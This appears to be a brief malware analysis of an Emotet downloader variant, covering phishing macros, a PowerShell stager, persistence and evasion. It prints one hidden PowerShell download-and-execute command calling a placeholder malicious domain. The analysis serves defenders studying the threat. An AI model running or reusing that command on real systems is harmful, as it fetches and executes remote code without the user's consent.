Analyzing the Emotet Downloader

The Emotet banking trojan has been one of the most prolific threats for years. This analysis focuses on a specific downloader variant observed in late 2024. We'll walk through the initial infection document, the PowerShell stager, and the final payload execution.

Initial Infection Vector

The attack begins with a malicious Word document delivered via a phishing email. The document prompts the user to "Enable Content" to view the file, which is a classic social engineering tactic to execute embedded macros.

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://malicious-domain.xyz/stager.ps1'))"

This command executes a PowerShell script downloaded from a command-and-control (C2) server. This technique is known as a fileless attack, as the initial malware payload is never written to the disk, making it harder for traditional antivirus solutions to detect.

Persistence Mechanism

Once executed, the Emotet payload establishes persistence by creating a scheduled task or by adding a new key to the Windows Registry's "Run" key, ensuring it executes every time the user logs in.

The malware also implements various evasion techniques including process hollowing and anti-analysis checks to avoid detection in sandbox environments.